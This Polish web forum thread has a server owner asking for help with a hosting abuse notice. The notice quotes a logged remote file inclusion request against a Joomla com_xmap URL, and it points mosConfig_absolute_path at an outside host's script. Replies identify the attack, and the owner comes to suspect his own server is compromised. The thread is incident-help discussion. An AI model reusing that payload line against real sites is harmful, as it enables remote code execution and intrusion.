Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> Atak na serwis..
pieto
post
Post #1





Grupa: Zarejestrowani
Postów: 227
Pomógł: 1
Dołączył: 12.05.2002
Skąd: gdańsk

Ostrzeżenie: (0%)
-----

Witam serdecznie,

Dostalem monit od HostEurope o ataku na serwis, nie bardzo rozumiem monit ktory mi przesłali:

> Mon Oct 27 09:45:01 CET 2008
>
> I am sorry to have to inform you that access to our server for the host
with the IP-Address 87.230.33.107 has been denied.
>
> The host identified by IP-Address [zmoderowane] has tried to execute
following action[s]:
>
> -----------------------------------------------------
> 87.230.33.107 - - [27/Oct/2008:09:41:07 +0100] "GET
/index.php?option=com_xmap&Itemid=&mosConfig_absolute_path=http://[zmoderowane].com/spam/bo.do?
HTTP/1.1" 404 18787 "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1)
Gecko/20060918 Firefox/2.0"
> Mon Oct 27 09:42:06 CET 2008 [B++] Blocking permanently [zmoderowane]
[zmoderowane]. Host seems to be a server. Response: Interesting ports on
[zmoderowane] ([zmoderowane]): 22/tcp open ssh 25/tcp
open smtp 80/tcp open http 110/tcp open pop3
> -----------------------------------------------------
>
> This action[s] has been recognized as an hack attempt and access to the
server for this IP-Address has been denied.
>
> See also: [zmoderowane]
>
>
> Best Regards,
> Abuse Reporting Script
>
> PS: IMPORTANT: This email has been generated automatically. Remember,
this is just a notification. Please do not reply to this email.
>
> --------------------------------
>
> NOTICE - This e-mail is only intended to be read by the named recipient.
> It may contain information which is confidential, proprietary or the
subject of legal privilege.
> If you are not the intended recipient please notify the sender
immediately and delete this e-mail.
> You may not use any information contained in it.
> Legal privilege is not waived because you have read this e-mail.
>
>
>

Jak to powianiem przeanalizować ? co sprawdzić ? i co im odpisać bo mnie straszą że wyłączą VPS! ?
Go to the top of the page
+Quote Post
 
 Start new topic
Odpowiedzi (1 - 6)
MFIPETER
post
Post #2





Grupa: Zarejestrowani
Postów: 31
Pomógł: 0
Dołączył: 19.01.2008
Skąd: Kraków

Ostrzeżenie: (0%)
-----

Nic nie powinieneś odpisywać bo to jest wiadomość wygenerowana automatycznie i jest nawet to napisane w ostatniej linijce :

CODE

> PS: IMPORTANT: This email has been generated automatically. Remember,
this is just a notification. Please do not reply to this email.


(cienko z angielskim ?)

Poinformowali Cię po prostu, że jakiś gość o IP 87.230.33.107 próbował Ci coś tam popsuć i że jego IP zostało zablokowane. Napisali abyś zapoznał się z tym czymś : [zmoderowane]

Pozdrawiam
Go to the top of the page
+Quote Post
webdice
post
Post #3


Developer


Grupa: Moderatorzy
Postów: 3 045
Pomógł: 290
Dołączył: 20.01.2007
Nieptrzebne dla nikogo adres IP, nazwy hostów oraz linki zmoderowałem.
Go to the top of the page
+Quote Post
pyro
post
Post #4





Grupa: Zarejestrowani
Postów: 2 148
Pomógł: 230
Dołączył: 26.03.2008

Ostrzeżenie: (0%)
-----

/index.php?option=com_xmap&Itemid=&mosConfig_absolute_path=http://[zmoderowane].com/spam/bo.do?

wyglada na to, ze ktos probowal uzyc ataku RFI
Go to the top of the page
+Quote Post
pieto
post
Post #5





Grupa: Zarejestrowani
Postów: 227
Pomógł: 1
Dołączył: 12.05.2002
Skąd: gdańsk

Ostrzeżenie: (0%)
-----

MFIPETER - Dzieki za blyskotliwą odpowiedź (IMG:http://forum.php.pl/style_emoticons/default/yahoo.gif)
Tyle ze ktos probowal namieszać to chyba jasne jak słońce

adres IP to adres mojego serwera i ktoś probował wykonać ten plik http://vobucks.com/spam/bo.do?
wciskając to GETem,

Nie rozumiem co mogą namieszać te zmienne - ?option=com_xmap&Itemid=&mosConfig_absolute_path=
czy nie są to jakieś zminne serwerowe ?

Jak dlamnie nic to nie psuuje - chociaz Oni sie klucą ze obciązam im siec!

Może być uruchomiony jakiś skrypt - jak mogę go wykryć ?

Ten post edytował pieto 28.10.2008, 19:55:14
Go to the top of the page
+Quote Post
pyro
post
Post #6





Grupa: Zarejestrowani
Postów: 2 148
Pomógł: 230
Dołączył: 26.03.2008

Ostrzeżenie: (0%)
-----

Cytat(pieto @ 28.10.2008, 20:54:13 ) *
MFIPETER - Dzieki za blyskotliwą odpowiedź (IMG:http://forum.php.pl/style_emoticons/default/yahoo.gif)
Tyle ze ktos probowal namieszać to chyba jasne jak słońce

adres IP to adres mojego serwera i ktoś probował wykonać ten plik http://vobucks.com/spam/bo.do?
wciskając to GETem,

Nie rozumiem co mogą namieszać te zmienne - ?option=com_xmap&Itemid=&mosConfig_absolute_path=
czy nie są to jakieś zminne serwerowe ?

Jak dlamnie nic to nie psuuje - chociaz Oni sie klucą ze obciązam im siec!

Może być uruchomiony jakiś skrypt - jak mogę go wykryć ?


spojrz na mojego ostatniego posta (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)
Go to the top of the page
+Quote Post
pieto
post
Post #7





Grupa: Zarejestrowani
Postów: 227
Pomógł: 1
Dołączył: 12.05.2002
Skąd: gdańsk

Ostrzeżenie: (0%)
-----

EE, moze w drugą stronę,
dopiero teraz skumalem ze to ja wysylam (IMG:http://forum.php.pl/style_emoticons/default/sciana.gif) jakies smieci,
jak mozna najlatwiej dojsc gdzie to siedzi i zniszczyc ?

mam SUSE 10 z pleskiem
Go to the top of the page
+Quote Post
« Następny starszy · Serwery WWW · Następny nowszy »
 

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Przełącz na: Standardowy · Linearny+ · Przełącz na: Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 23.08.2025 - 18:25
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn